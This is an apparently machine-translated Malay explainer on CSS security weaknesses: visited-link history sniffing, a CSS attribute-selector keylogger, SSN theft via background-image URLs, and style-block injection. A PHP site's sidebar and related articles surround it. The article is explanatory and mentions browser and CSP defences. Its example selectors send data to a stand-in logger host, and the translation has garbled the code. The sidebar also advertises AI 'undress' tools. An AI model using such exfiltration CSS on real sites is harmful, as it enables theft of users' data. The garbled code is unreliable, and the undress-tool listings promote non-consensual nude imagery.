Jangan panik! CSS sendiri bukan risiko keselamatan utama, dan dalam kebanyakan kes tidak perlu terlalu risau.
Walau bagaimanapun, beberapa artikel akan membincangkan ciri -ciri CSS yang berpotensi mengejutkan dan juga membimbangkan. Mari kita meringkaskan:
Isu pautan yang telah dikunjungi
Masalahnya digambarkan seperti berikut:
- Terdapat pautan di laman web ke halaman tertentu, seperti Tickle Pigs .
- Anda menggunakan
:visiteduntuk menetapkan warna pautan yang dikunjungi, sepertia:visited { color: pink; }, yang bukan gaya ejen pengguna lalai. - Anda menguji gaya pengiraan pautan.
- Jika warna berwarna merah jambu, ini bermakna pengguna telah melawat halaman tersebut.
- Anda melaporkan maklumat ini kepada pelayan dan melakukan tindakan tertentu dengan sewajarnya (seperti meningkatkan kadar premium insurans).
Anda mungkin melakukan ini dengan CSS sepenuhnya, kerana gaya :visited mungkin mengandungi background-image: url(/data-logger/tickle.php); , yang hanya akan diminta oleh pengguna yang telah melawat halaman tersebut.
Jangan risau! Pelayar telah menyekat serangan ini.
Keylogger
Masalahnya digambarkan seperti berikut:
- Terdapat kotak input pada halaman, mungkin kotak input kata laluan.
- Anda mengambil skrip rekod sebagai imej latar belakang kotak input dan menambah sebilangan besar pemilih untuk mengumpul maklumat kata laluan.
input [nilai^= "a"] {latar belakang: url (logger.php? v = a); }
Ini tidak mudah dicapai. Atribut value kotak input tidak akan berubah dengan segera kerana input pengguna. Tetapi dalam kerangka seperti React, ini kadang -kadang berlaku. Oleh itu, secara teori, keylogger CSS ini mungkin berfungsi jika anda menambah CSS ini ke halaman log masuk yang dibina dengan React.
Walau bagaimanapun, dalam kes ini, kod JavaScript telah dilaksanakan pada halaman. Untuk serangan sedemikian, JavaScript jauh lebih berbahaya daripada CSS. Keylogger JavaScript memantau peristiwa utama dan melaporkannya melalui Ajax dengan hanya beberapa baris kod.
Dasar Keselamatan Kandungan (CSP) boleh menyekat JavaScript dalam talian yang disuntik oleh pihak ketiga dan XSS ... dan tentu saja, ia juga boleh menyekat CSS.
Kecurian data
Masalahnya digambarkan seperti berikut:
- Sekiranya saya dapat menambah CSS yang berniat jahat ke halaman laman web yang anda log masuk ...
- Dan laman web memaparkan maklumat sensitif, seperti Nombor Keselamatan Sosial (SSN), pra-penuh dalam bentuk ...
- Saya boleh mendapatkannya dengan pemilih harta.
input#ssn [value = "123-45-6789"] {latar belakang: url (https://secret-site.com/logger.php?ssn=123-45-6789); }
Dengan sebilangan besar pemilih, anda boleh menampung semua kemungkinan!
Masalah Blok Gaya Baris
Saya tidak pasti jika ini harus dipersalahkan di CSS, tetapi bayangkan:
... masukkan beberapa kandungan yang dihasilkan pengguna ...
Mungkin anda membenarkan pengguna menyesuaikan beberapa CSS. Ini adalah vektor serangan kerana mereka boleh menutup tag gaya, tag skrip terbuka, dan menulis kod JavaScript yang berniat jahat.
Pasti ada lagi
Adakah anda memikirkannya? Kongsi.
Saya ragu -ragu mengenai tahap ketakutan terhadap kelemahan keselamatan CSS. Saya tidak mahu mengatasi masalah keselamatan (terutamanya isu pihak ketiga) kerana saya bukan pakar dan keselamatan adalah penting. Tetapi pada masa yang sama, saya tidak pernah mendengar tentang CSS menjadi vektor serangan selain daripada eksperimen pemikiran. Tolong ajar saya!
Atas ialah kandungan terperinci Kelemahan keselamatan CSS. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
Alat AI Hot
Undress AI Tool
Gambar buka pakaian secara percuma
Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik
AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.
Clothoff.io
Penyingkiran pakaian AI
Video Face Swap
Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!
Artikel Panas
Alat panas
Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma
SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan
Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa
Dreamweaver CS6
Alat pembangunan web visual
SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)
Tutorial CSS untuk membuat pemuatan dan animasi pemuatan
Jul 07, 2025 am 12:07 AM
Terdapat tiga cara untuk membuat pemutar pemuatan CSS: 1. Gunakan pemutar asas sempadan untuk mencapai animasi mudah melalui HTML dan CSS; 2. Gunakan pemutar tersuai pelbagai mata untuk mencapai kesan lompat melalui masa kelewatan yang berlainan; 3. Tambahkan pemutar dalam butang dan beralih kelas melalui JavaScript untuk memaparkan status pemuatan. Setiap pendekatan menekankan pentingnya butiran reka bentuk seperti warna, saiz, kebolehcapaian dan pengoptimuman prestasi untuk meningkatkan pengalaman pengguna.
Menangani masalah dan awalan keserasian penyemak imbas CSS
Jul 07, 2025 am 01:44 AM
Untuk menangani keserasian pelayar CSS dan isu awalan, anda perlu memahami perbezaan sokongan penyemak imbas dan menggunakan awalan vendor dengan munasabah. 1. Memahami masalah biasa seperti Flexbox dan sokongan grid, kedudukan: prestasi tidak sah, dan prestasi animasi adalah berbeza; 2. Periksa status sokongan ciri CANIUSE Ciri; 3. Gunakan dengan betul -webkit-, -moz-, -ms-, -o- dan awalan pengeluar lain; 4. Adalah disyorkan untuk menggunakan autoprefixer untuk menambah awalan secara automatik; 5. Pasang postcss dan konfigurasi penyemak imbas untuk menentukan penyemak imbas sasaran; 6. Secara automatik mengendalikan keserasian semasa pembinaan; 7. Ciri -ciri pengesanan moden boleh digunakan untuk projek lama; 8. Tidak perlu meneruskan konsistensi semua pelayar,
Membuat bentuk tersuai dengan laluan klip CSS
Jul 09, 2025 am 01:29 AM
Gunakan atribut clip-path CSS untuk menanam unsur-unsur ke dalam bentuk tersuai, seperti segitiga, takik bulat, poligon, dan lain-lain, tanpa bergantung pada gambar atau SVG. Kelebihannya termasuk: 1. Menyokong pelbagai bentuk asas seperti Circle, Ellipse, Polygon, dan lain -lain; 2. Pelarasan responsif dan boleh disesuaikan dengan terminal mudah alih; 3. Mudah untuk animasi, dan boleh digabungkan dengan hover atau javascript untuk mencapai kesan dinamik; 4. Ia tidak menjejaskan aliran susun atur, dan hanya tanaman kawasan paparan. Penggunaan umum adalah seperti laluan klip bulat: bulatan (50pxatcenter) dan triangle clip-path: polygon (50%0%, 100 0%, 0 0%). Notis
Apakah perbezaan antara paparan: inline, paparan: blok, dan paparan: blok sebaris?
Jul 11, 2025 am 03:25 AM
Themaindifferencesbetweendisplay: inline, block, andinline-blockinhtml/cssarelayoutbehavior, spaceusage, andstylingcontrol.1.inlineelementsflowwithtext, notstartonNewlines, abaikanwidth/height, andonyapplylylylylylinddding/
Gaya yang dikunjungi pautan berbeza dengan CSS
Jul 11, 2025 am 03:26 AM
Menetapkan gaya pautan yang telah anda lawati dapat meningkatkan pengalaman pengguna, terutama di laman web yang berintensifkan kandungan untuk membantu pengguna menavigasi lebih baik. 1. Gunakan CSS: Kelas pseudo yang dilawati untuk menentukan gaya pautan yang dikunjungi, seperti perubahan warna; 2. Perhatikan bahawa penyemak imbas hanya membenarkan pengubahsuaian beberapa atribut disebabkan oleh sekatan privasi; 3. Pemilihan warna harus diselaraskan dengan gaya keseluruhan untuk mengelakkan ketangkasan; 4. Terminal mudah alih mungkin tidak memaparkan kesan ini, dan disyorkan untuk menggabungkannya dengan arahan visual lain seperti logo tambahan ikon.
Bagaimana untuk membuat imej responsif menggunakan CSS?
Jul 15, 2025 am 01:10 AM
Untuk membuat imej responsif menggunakan CSS, ia boleh dicapai terutamanya melalui kaedah berikut: 1. Gunakan maksimum lebar: 100% dan ketinggian: auto untuk membolehkan imej menyesuaikan diri dengan lebar kontena sambil mengekalkan perkadaran; 2. Gunakan atribut SRCSET dan saiz HTML dengan bijak memuatkan sumber imej yang disesuaikan dengan skrin yang berbeza; 3. Gunakan objek-sesuai dan kedudukan objek untuk mengawal penanaman imej dan paparan fokus. Bersama -sama, kaedah ini memastikan bahawa imej dibentangkan dengan jelas dan indah pada peranti yang berbeza.
Unit CSS Demystifying: PX, EM, REM, VW, VH Perbandingan
Jul 08, 2025 am 02:16 AM
Pilihan unit CSS bergantung kepada keperluan reka bentuk dan keperluan responsif. 1.PX digunakan untuk saiz tetap, sesuai untuk kawalan yang tepat tetapi kekurangan keanjalan; 2.EM adalah unit relatif, yang mudah disebabkan oleh pengaruh unsur induk, sementara REM lebih stabil berdasarkan unsur akar dan sesuai untuk skala global; 3.VW/VH didasarkan pada saiz viewport, sesuai untuk reka bentuk yang responsif, tetapi perhatian harus dibayar kepada prestasi di bawah skrin yang melampau; 4. Apabila memilih, ia harus ditentukan berdasarkan sama ada pelarasan responsif, hubungan hierarki elemen dan ketergantungan viewport. Penggunaan yang munasabah boleh meningkatkan fleksibiliti dan penyelenggaraan susun atur.
Apakah ketidakkonsistenan penyemak imbas CSS biasa?
Jul 26, 2025 am 07:04 AM
Penyemak imbas yang berbeza mempunyai perbezaan dalam parsing CSS, mengakibatkan kesan paparan yang tidak konsisten, terutamanya termasuk perbezaan gaya lalai, kaedah pengiraan model kotak, flexbox dan tahap sokongan susun atur grid, dan tingkah laku yang tidak konsisten bagi atribut CSS tertentu. 1. Pemprosesan gaya lalai tidak konsisten. Penyelesaiannya adalah menggunakan cssreset atau normalisasi.css untuk menyatukan gaya awal; 2. Kaedah pengiraan model kotak versi lama IE adalah berbeza. Adalah disyorkan untuk menggunakan kotak-kotak: kotak sempadan dengan cara yang bersatu; 3. Flexbox dan grid melakukan secara berbeza dalam kes kelebihan atau dalam versi lama. Lebih banyak ujian dan gunakan autoprefixer; 4. Beberapa tingkah laku atribut CSS tidak konsisten. CANIUSE mesti dirujuk dan diturunkan.
